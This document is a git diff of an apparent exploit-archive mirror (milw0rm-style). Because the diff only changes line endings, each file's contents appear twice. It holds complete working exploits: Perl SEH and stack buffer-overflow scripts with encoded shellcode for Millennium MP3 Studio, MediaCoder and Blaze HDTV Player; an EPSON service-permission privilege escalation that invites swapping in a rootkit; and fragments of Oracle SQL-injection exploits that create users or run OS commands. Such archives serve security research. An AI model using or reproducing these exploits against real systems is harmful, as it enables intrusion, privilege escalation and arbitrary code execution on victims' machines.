-# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
-# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
-# eip hunters
-# -----------------------------------------------------------------------------
-#
-# Script provided for educational purposes only.
-#
-#
-#
-my $sploitfile="C:\\mp3-millennium\\c0d3rmp3studio.m3u";
-my $totallen=5007;
-#
-my $junk = "http://";
-my $buffer="A" x 4103;
-my $seh = "\xeb\x1e\x90\x90"; #jump forest, jump !
-my $nseh = pack('V',0x10020BA7); #pop pop ret from xaudio.dll
-my $nop="\x90" x 32;
-# windows/exec - 303 bytes
-# http://www.metasploit.com
-# Encoder: x86/alpha_upper
-# EXITFUNC=seh, CMD=calc
-my $shellcode="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
-"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
-"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
-"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
-"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
-"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
-"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
-"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
-"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
-"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
-"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
-"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
-"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
-"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
-"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
-"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
-"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
-"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
-"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
-"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
-"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
-"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
-
-
-my $shelllen = $totallen-length($junk)-length($buffer)-length($seh)-length($nseh)-length($nop)-length($shellcode);
-my $finalnop="\x90" x $shelllen;
-
-my $payload=$junk.$buffer.$seh.$nseh.$nop.$shellcode.$finalnop;
-#
-#
-print "[+] Writing exploit file $sploitfile\n";
-open (myfile,">$sploitfile");
-print myfile $payload;
-close (myfile);
-print "[+] ".length($payload)." bytes written to file\n";
-print " junk : " . length($junk)."\n";
-print " buf : " . length($buffer)."\n";
-print " seh : " . length($seh)."\n";
-print " nseh : " . length($nseh)."\n";
-print " nop : " . length($nop)."\n";
-print " shell : " . length($shellcode)."\n";
-print " nop2 : " . 
length($finalnop)."\n";
-#
-#
-
-# milw0rm.com [2009-07-30]
+#
+# [+] Vulnerability : .m3u File Local Stack Overflow Exploit (SEH) Full Rewrite
+# [+] Product : Millenium MP3 Studio
+# [+] Versions affected : v1.0
+# [+] Download : http://www.software112.com/products/mp3-millennium+download.html
+# [+] Method : seh
+# [+] Tested on : Windows XP SP3 En
+# [+] Written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com
+# [+] Greetz to : Saumil & SK
+# [+] Note : sorry for the previous version, that was a real mess
+# I mixed up 2 sploits...
+# This one should be a lot better
+# -----------------------------------------------------------------------------
+# MMMMM~.
+# MMMMM?.
+# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
+# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
+# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
+# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
+# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
+# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
+# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
+# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
+# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
+# eip hunters
+# -----------------------------------------------------------------------------
+#
+# Script provided for educational purposes only.
+#
+#
+#
+my $sploitfile="C:\\mp3-millennium\\c0d3rmp3studio.m3u";
+my $totallen=5007;
+#
+my $junk = "http://";
+my $buffer="A" x 4103;
+my $seh = "\xeb\x1e\x90\x90"; #jump forest, jump !
+my $nseh = pack('V',0x10020BA7); #pop pop ret from xaudio.dll
+my $nop="\x90" x 32;
+# windows/exec - 303 bytes
+# http://www.metasploit.com
+# Encoder: x86/alpha_upper
+# EXITFUNC=seh, CMD=calc
+my $shellcode="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
+"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
+"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
+"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
+"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
+"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
+"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
+"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
+"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
+"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
+"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
+"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
+"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
+"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
+"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
+"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
+"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
+"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
+"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
+"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
+"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
+
+
+my $shelllen = $totallen-length($junk)-length($buffer)-length($seh)-length($nseh)-length($nop)-length($shellcode);
+my $finalnop="\x90" x $shelllen;
+
+my $payload=$junk.$buffer.$seh.$nseh.$nop.$shellcode.$finalnop;
+#
+#
+print "[+] Writing exploit file $sploitfile\n";
+open (myfile,">$sploitfile");
+print myfile $payload;
+close (myfile);
+print "[+] ".length($payload)." bytes written to file\n";
+print " junk : " . length($junk)."\n";
+print " buf : " . length($buffer)."\n";
+print " seh : " . length($seh)."\n";
+print " nseh : " . length($nseh)."\n";
+print " nop : " . length($nop)."\n";
+print " shell : " . length($shellcode)."\n";
+print " nop2 : " . 
length($finalnop)."\n";
+#
+#
+
+# milw0rm.com [2009-07-30]
diff --git a/platforms/windows/local/9305.txt b/platforms/windows/local/9305.txt
index 48163a3ce..8ae2e0261 100755
--- a/platforms/windows/local/9305.txt
+++ b/platforms/windows/local/9305.txt
@@ -1,49 +1,49 @@
-------- EPSON Status Monitor 3 local privilege escalation vulnerability --------
-by Nine:Situations:Group::bruiser
-site: http://retrogod.altervista.org/
---------------------------------------------------------------------------------
-After that pyrokinesis found: http://www.milw0rm.com/exploits/9199
-I prepared a tool to check for weak permissions and I come out with this:
-
-C:\>sc qc EPSON_EB_RPCV4_01
-[SC] QueryServiceConfig SUCCESS
-
-SERVICE_NAME: EPSON_EB_RPCV4_01
- TYPE : 10 WIN32_OWN_PROCESS
- START_TYPE : 2 AUTO_START
- ERROR_CONTROL : 1 NORMAL
- BINARY_PATH_NAME : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE
- LOAD_ORDER_GROUP :
- TAG : 0
- DISPLAY_NAME : EPSON V5 Service4(01)
- DEPENDENCIES : RpcSs
- SERVICE_START_NAME : LocalSystem
-
-C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE"
-C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE Everyone:F <------[ :( !!!]
-
-C:\>SC QC EPSON_PM_RPCV4_01
-[SC] QueryServiceConfig SUCCESS
-
-SERVICE_NAME: EPSON_PM_RPCV4_01
- TYPE : 10 WIN32_OWN_PROCESS
- START_TYPE : 2 AUTO_START
- ERROR_CONTROL : 1 NORMAL
- BINARY_PATH_NAME : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE
- LOAD_ORDER_GROUP :
- TAG : 0
- DISPLAY_NAME : EPSON V3 Service4(01)
- DEPENDENCIES : RpcSs
- SERVICE_START_NAME : LocalSystem
-
-C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE"
-C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE Everyone:F <------[ :( !!!]
-
-The executable files are installed with "full control" for Everyone; replace
-them with your favourite rootkit.
-They are carried by an EPSON STYLUS SX100 drivers cd. C'mon guys, no need for an
-exploit code, it can be triggered by the availiable command line tools.
-
---------------------------------------------------------------------------------
-
-# milw0rm.com [2009-07-30]
+------- EPSON Status Monitor 3 local privilege escalation vulnerability --------
+by Nine:Situations:Group::bruiser
+site: http://retrogod.altervista.org/
+--------------------------------------------------------------------------------
+After that pyrokinesis found: http://www.milw0rm.com/exploits/9199
+I prepared a tool to check for weak permissions and I come out with this:
+
+C:\>sc qc EPSON_EB_RPCV4_01
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: EPSON_EB_RPCV4_01
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : EPSON V5 Service4(01)
+ DEPENDENCIES : RpcSs
+ SERVICE_START_NAME : LocalSystem
+
+C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE"
+C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE Everyone:F <------[ :( !!!]
+
+C:\>SC QC EPSON_PM_RPCV4_01
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: EPSON_PM_RPCV4_01
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : EPSON V3 Service4(01)
+ DEPENDENCIES : RpcSs
+ SERVICE_START_NAME : LocalSystem
+
+C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE"
+C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE Everyone:F <------[ :( !!!]
+
+The executable files are installed with "full control" for Everyone; replace
+them with your favourite rootkit.
+They are carried by an EPSON STYLUS SX100 drivers cd. 
C'mon guys, no need for an
+exploit code, it can be triggered by the availiable command line tools.
+
+--------------------------------------------------------------------------------
+
+# milw0rm.com [2009-07-30]
diff --git a/platforms/windows/local/932.sql b/platforms/windows/local/932.sql
index 1d93a7eca..f2519868c 100755
--- a/platforms/windows/local/932.sql
+++ b/platforms/windows/local/932.sql
@@ -142,6 +142,6 @@ FFD0 CALL EAX */ || 'dir>c:\dir.txt'; -- OS command to execute a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => AAA); -END; - -// milw0rm.com [2005-04-13] +END; + +// milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/933.sql b/platforms/windows/local/933.sql
index d1c7b61dd..85fa6cdb3 100755
--- a/platforms/windows/local/933.sql
+++ b/platforms/windows/local/933.sql
@@ -280,6 +280,6 @@ GRANT EXECUTE ON "SYS"."SQLIVULN_CUR_USR" TO "SCOTT" -- To Exploit the attacker could execute: EXEC SYS.SQLIVULN('MANAGER''||SYS.SQLIVULN_CUR_USR(''AA''''; execute immediate ''''declare pragma autonomous_transaction; begin execute immediate ''''''''create -user eric identified by newpsw''''''''; commit; end;''''; end;--'')||'''); - --- milw0rm.com [2005-04-13] +user eric identified by newpsw''''''''; commit; end;''''; end;--'')||'''); + +-- milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/9343.pl b/platforms/windows/local/9343.pl
index 5e407022b..60fc07957 100755
--- a/platforms/windows/local/9343.pl
+++ b/platforms/windows/local/9343.pl
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-# MediaCoder 0.6.2.4275 .lst Stack Based Overflow > # Discovered by :[ SKULL-HACKER ]
-my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
-my $junk = "\x41" x 254;
-my $ret = "\x93\x43\x92\x7c"; #
-my $nop = "\x90" x 25;
-# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-my $calc_shell =
- "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
- "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
- "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
- "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
- "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
- "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
- "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
- "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
- "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
- "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
- "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
- "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
- "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
- "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
- "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
- "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
- "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
- "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
- "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
- "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
- "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
- "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
-
-print $header.$junk.$ret.$nop.$calc_shell.$nop;
-
-# > ## Author :
-# > SkuLL-HacKeR
-# > [»] Home : WwW.Sec-ArT.CoM/cc
-# >
-# > [»] GreetZ : ~~>: hack4love - ASER ELRO7 - str0ke : ,
-# > milw0rm.com
-# > [»] Special Thx : Of all Moroccans : Simo-soft - djekmani4ever - jadi
-# > chel7 ]
-# > [»] Contact MSN: Wizard-skh[at]HoTmaiL[Dot]CoM /
-# > SkuLL--HacKeR[at]hotmail.CoM
-
-
-# > | Sec-ArT.com :) _/
-
-# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
-
-# milw0rm.com [2009-08-03]
+#!/usr/bin/perl
+# MediaCoder 0.6.2.4275 .lst Stack Based Overflow > # Discovered by :[ SKULL-HACKER ]
+my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
+my $junk = "\x41" x 254;
+my $ret = "\x93\x43\x92\x7c"; #
+my $nop = "\x90" x 25;
+# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+my $calc_shell =
+ "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+ "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
+ "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
+ "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
+ "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
+ "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
+ "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
+ "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
+ "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
+ "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
+ "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
+ "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
+ "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
+ "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
+ "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
+ "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
+ "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
+ "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
+
+print $header.$junk.$ret.$nop.$calc_shell.$nop;
+
+# > ## Author :
+# > SkuLL-HacKeR
+# > [»] Home : WwW.Sec-ArT.CoM/cc
+# >
+# > [»] GreetZ : ~~>: hack4love - ASER ELRO7 - str0ke : ,
+# > milw0rm.com
+# > [»] Special Thx : Of all Moroccans : Simo-soft - djekmani4ever - jadi
+# > chel7 ]
+# > [»] Contact MSN: Wizard-skh[at]HoTmaiL[Dot]CoM /
+# > SkuLL--HacKeR[at]hotmail.CoM
+
+
+# > | Sec-ArT.com :) _/
+
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+
+# milw0rm.com [2009-08-03]
diff --git a/platforms/windows/local/9346.pl b/platforms/windows/local/9346.pl
index db767c43d..e2b8ee672 100755
--- a/platforms/windows/local/9346.pl
+++ b/platforms/windows/local/9346.pl
@@ -1,44 +1,44 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH)
-# ## easy ##
-###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team
-##AND special THANKS FOR EL7ADRANY ##AND 3ASFH TEAM##
-## this work sooooooooo good
-## Tested on: Windows XP Pro SP2 (EN)
-##################################################################
-my $bof="\x41" x 608;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xb8\x15\xd1\x72";
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.PLF');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-03]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH)
+# ## easy ##
+###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team
+##AND special THANKS FOR EL7ADRANY ##AND 3ASFH TEAM##
+## this work sooooooooo good
+## Tested on: Windows XP Pro SP2 (EN)
+##################################################################
+my $bof="\x41" x 608;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xb8\x15\xd1\x72";
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.PLF');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-03]
diff --git a/platforms/windows/local/935.c b/platforms/windows/local/935.c
index bcf56d1d8..c3dc57173 100755
--- a/platforms/windows/local/935.c
+++ b/platforms/windows/local/935.c
@@ -153,6 +153,6 @@ printf("Altnick : %s\n",AltNick); printf("Password : %s\n",Password); return 0; -} - -// milw0rm.com [2005-04-13] +} + +// milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/9354.pl b/platforms/windows/local/9354.pl
index 786542324..6abca056c 100755
--- a/platforms/windows/local/9354.pl
+++ b/platforms/windows/local/9354.pl
@@ -1,28 +1,28 @@
-#!/usr/bin/perl
